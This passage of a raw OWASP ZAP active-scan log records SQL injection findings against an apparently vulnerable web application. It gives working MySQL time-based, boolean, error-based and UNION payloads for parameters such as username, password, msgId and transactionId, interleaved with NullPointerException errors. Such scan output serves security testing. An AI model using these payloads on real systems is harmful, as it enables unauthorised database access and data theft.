time-based blind (SELECT) with payload [10000 AND (SELECT * FROM (SELECT(SLEEP(5)))TEAP)] on parameter 'minBalanace' 9539391 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9539405 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test 9539409 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - target url appears to have 1 column in query 9539458 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test 9539463 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - target url appears to have 1 column in query 9539477 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test 9539482 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - target url appears to have 1 column in query 9539519 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test 9539524 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - target url appears to have 1 column in query 9539551 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [BOOLEAN-BASED Injection Found] MySQL >= 5.0 boolean-based blind - Parameter replace with payload [(SELECT (CASE WHEN (8173=8173) THEN 8173 ELSE 8173*(SELECT 8173 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))] on parameter 'msgId' 9539552 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9539811 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [TIME-BASED Injection Found] MySQL >= 5.0.12 AND time-based blind (SELECT) with payload [1 AND (SELECT * FROM (SELECT(SLEEP(5)))kMNS)] on parameter 'msgid' 9539812 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9540153 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [BOOLEAN-BASED Injection Found] MySQL >= 5.0 boolean-based blind - Parameter replace with payload [(SELECT (CASE WHEN (3987=3987) THEN 3987 ELSE 3987*(SELECT 3987 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))] on parameter 'orderby' 9540154 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9549609 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [TIME-BASED Injection Found] MySQL >= 5.0.12 AND time-based blind (SELECT) with payload [1 AND (SELECT * FROM (SELECT(SLEEP(5)))yRkD)] on parameter 'msgId' 9549610 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9549701 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [UNION-BASED Injection Found] MySQL UNION query (NULL) - 1 to 10 columns with payload [1 #] on parameter 'msgId' 9549702 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9549761 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [BOOLEAN-BASED Injection Found] MySQL >= 5.0 boolean-based blind - Parameter replace with payload [(SELECT (CASE WHEN (3537=3537) THEN 3537 ELSE 3537*(SELECT 3537 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))] on parameter 'transactionId' 9549761 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9550225 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [TIME-BASED Injection Found] MySQL >= 5.0.12 AND time-based blind (SELECT) with payload [msgid AND (SELECT * FROM (SELECT(SLEEP(5)))BHrf)] on parameter 'orderby' 9550225 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9550871 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'msg' is not injectable 9559823 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [TIME-BASED Injection Found] MySQL >= 5.0.12 AND time-based blind (SELECT) with payload [1 AND (SELECT * FROM (SELECT(SLEEP(5)))VDwU)-- Lruj] on parameter 'transactionId' 9559824 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9559835 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test 9559840 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - target url appears to have 4 column in query 9559886 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test 9559890 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - target url appears to have 4 column in query 9559907 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test 9559911 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - target url appears to have 4 column in query 9559914 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [UNION-BASED Injection Found] MySQL UNION query (NULL) - 1 to 10 columns with payload [1 #] on parameter 'transactionId' 9559915 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9561025 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [TIME-BASED Injection Found] MySQL >= 5.0.12 AND time-based blind (SELECT) with payload [ZAP' AND (SELECT * FROM (SELECT(SLEEP(5)))bnjE) AND 'diyQ'='diyQ] on parameter 'username' 9561027 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9561062 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test 9561069 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - target url appears to have 1 column in query 9561071 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test 9561076 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - target url appears to have 1 column in query 9561123 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test 9561130 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - target url appears to have 1 column in query 9561133 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test 9561137 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - target url appears to have 1 column in query 9570030 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [TIME-BASED Injection Found] MySQL >= 5.0.12 AND time-based blind (SELECT) with payload [ZAP%' AND (SELECT * FROM (SELECT(SLEEP(5)))fBdJ) AND '%'='] on parameter 'msg' 9570031 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9570065 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test 9570071 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - target url appears to have 3 column in query 9570140 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test 9570144 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - target url appears to have 3 column in query 9570145 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [UNION-BASED Injection Found] MySQL UNION query (NULL) - 1 to 10 columns with payload [ZAP' #] on parameter 'msg' 9570146 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9571241 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [TIME-BASED Injection Found] MySQL >= 5.0.12 AND time-based blind (SELECT) with payload [ZAP' AND (SELECT * FROM (SELECT(SLEEP(5)))XSNL) AND 'JpYJ'='JpYJ] on parameter 'username' 9571242 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9571289 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test 9571294 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - target url appears to have 2 column in query 9571300 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test 9571304 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - target url appears to have 2 column in query 9571355 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test 9571361 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - target url appears to have 2 column in query 9571362 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [UNION-BASED Injection Found] MySQL UNION query (NULL) - 1 to 10 columns with payload [ZAP' #] on parameter 'username' 9571363 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9571620 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [BOOLEAN-BASED Injection Found] MySQL >= 5.0 boolean-based blind - Parameter replace with payload [(SELECT (CASE WHEN (6998=6998) THEN 6998 ELSE 6998*(SELECT 6998 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))] on parameter 'msgid' 9571621 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9571624 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [ERROR-BASED Injection Found] MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause with payload [1 AND (SELECT 7883 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(7883=7883,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)] on parameter 'msgid' 9571624 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9581449 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [TIME-BASED Injection Found] MySQL >= 5.0.12 AND time-based blind (SELECT) with payload [ZAP' AND (SELECT * FROM (SELECT(SLEEP(5)))zmNG) AND 'wtgH'='wtgH] on parameter 'password' 9581450 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9581496 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test 9581501 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - target url appears to have 2 column in query 9581504 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test 9581510 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - target url appears to have 2 column in query 9581559 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test 9581563 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - target url appears to have 2 column in query 9581564 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [UNION-BASED Injection Found] MySQL UNION query (NULL) - 1 to 10 columns with payload [ZAP' #] on parameter 'password' 9581565 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9581605 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [BOOLEAN-BASED Injection Found] AND boolean-based blind - WHERE or HAVING clause with payload [10000 AND 9799=9799] on parameter 'minBalanace' 9581606 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9581609 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [ERROR-BASED Injection Found] MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause with payload [10000 AND (SELECT 8324 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(8324=8324,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)] on parameter 'minBalanace' 9581610 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9581655 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [TIME-BASED Injection Found] MySQL >= 5.0.12 AND time-based blind (SELECT) with payload [1 AND (SELECT * FROM (SELECT(SLEEP(5)))BNPB)] on parameter 'msgid' 9581656 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9581818 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [BOOLEAN-BASED Injection Found] AND boolean-based blind - WHERE or HAVING clause with payload [1 AND 8124=8124] on parameter 'msgId' 9581819 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9581821 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [ERROR-BASED Injection Found] MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause with payload [1 AND (SELECT 5376 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(5376=5376,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)] on parameter 'msgId' 9581822 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9591638 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [TIME-BASED Injection Found] MySQL >= 5.0.12 AND time-based blind (SELECT) with payload [10000 AND (SELECT * FROM (SELECT(SLEEP(5)))IcVC)] on parameter 'minBalanace' 9591639 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9591656 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test 9591660 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - target url appears to have 1 column in query 9591690 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test 9591695 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - target url appears to have 1 column in query 9591711 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test 9591716 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - target url appears to have 1 column in query 9591744 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test 9591751 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - target url appears to have 1 column in query 9591824 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [BOOLEAN-BASED Injection Found] MySQL >= 5.0 boolean-based blind - Parameter replace with payload [(SELECT (CASE WHEN (4547=4547) THEN 4547 ELSE 4547*(SELECT 4547 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))] on parameter 'transactionId' 9591825 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9591860 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [ERROR-BASED Injection Found] MySQL >= 5.0 error-based - Parameter replace with payload [(SELECT 7785 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(7785=7785,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)] on parameter 'transactionId' 9591861 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9592041 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [TIME-BASED Injection Found] MySQL >= 5.0.12 AND time-based blind (SELECT) with payload [1 AND (SELECT * FROM (SELECT(SLEEP(5)))KHQX)] on parameter 'msgId' 9592042 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9592058 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test 9592062 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - target url appears to have 3 column in query 9592097 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test 9592101 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - target url appears to have 3 column in query 9592118 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test 9592122 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - target url appears to have 3 column in query 9592123 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [UNION-BASED Injection Found] MySQL UNION query (NULL) - 1 to 10 columns with payload [1 #] on parameter 'msgId' 9592124 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9592228 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [BOOLEAN-BASED Injection Found] MySQL >= 5.0 boolean-based blind - Parameter replace with payload [(SELECT (CASE WHEN (9963=9963) THEN 9963 ELSE 9963*(SELECT 9963 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))] on parameter 'transactionDate' 9592229 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9592254 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [ERROR-BASED Injection Found] MySQL >= 5.0 error-based - Parameter replace with payload [(SELECT 9733 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(9733=9733,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)] on parameter 'transactionDate' 9592255 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9601896 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [TIME-BASED Injection Found] MySQL >= 5.0.12 AND time-based blind (SELECT) with payload [1 AND (SELECT * FROM (SELECT(SLEEP(5)))tYjH)-- smLT] on parameter 'transactionId' 9601897 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9601912 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test 9601917 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - target url appears to have 4 column in query 9601957 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test 9601967 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - target url appears to have 4 column in query 9601985 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test 9601989 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - target url appears to have 4 column in query 9601990 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [UNION-BASED Injection Found] MySQL UNION query (NULL) - 1 to 10 columns with payload [1 #] on parameter 'transactionId' 9601991 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9602062 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [ERROR-BASED Injection Found] MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause with payload [2010-02-02' AND (SELECT 4940 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(4940=4940,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'rYKY'='rYKY] on parameter 'transactionDate' 9602063 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9602285 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [TIME-BASED Injection Found] MySQL >= 5.0.12 AND time-based blind (SELECT) with payload [2010-01-01 AND (SELECT * FROM (SELECT(SLEEP(5)))zfCy)] on parameter 'transactionDate' 9602286 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9602299 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test 9602305 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - target url appears to have 4 column in query 9602334 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test 9602338 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - target url appears to have 4 column in query 9602356 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test 9602360 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - target url appears to have 4 column in query 9602361 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [UNION-BASED Injection Found] MySQL UNION query (NULL) - 1 to 10 columns with payload [2010-01-01 #] on parameter 'transactionDate' 9602364 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9602429 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [BOOLEAN-BASED Injection Found] AND boolean-based blind - WHERE or HAVING clause with payload [2010-01-01' AND 8958=8958 AND 'MCdi'='MCdi] on parameter 'transactionDate' 9602430 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9602435 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [ERROR-BASED Injection Found] MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause with payload [2010-01-01' AND (SELECT 8429 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(8429=8429,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'sNiI'='sNiI] on parameter 'transactionDate' 9602436 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9612121 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [TIME-BASED Injection Found] MySQL >= 5.0.12 AND time-based blind (SELECT) with payload [2010-02-02' AND (SELECT * FROM (SELECT(SLEEP(5)))yJGb) AND 'iyHN'='iyHN] on parameter 'transactionDate' 9612122 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9612435 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [BOOLEAN-BASED Injection Found] AND boolean-based blind - WHERE or HAVING clause with payload [2010-01-01' AND 3620=3620 AND 'DEPC'='DEPC] on parameter 'transactionDate' 9612436 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9612440 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [ERROR-BASED Injection Found] MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause with payload [2010-01-01' AND (SELECT 2605 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(2605=2605,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY 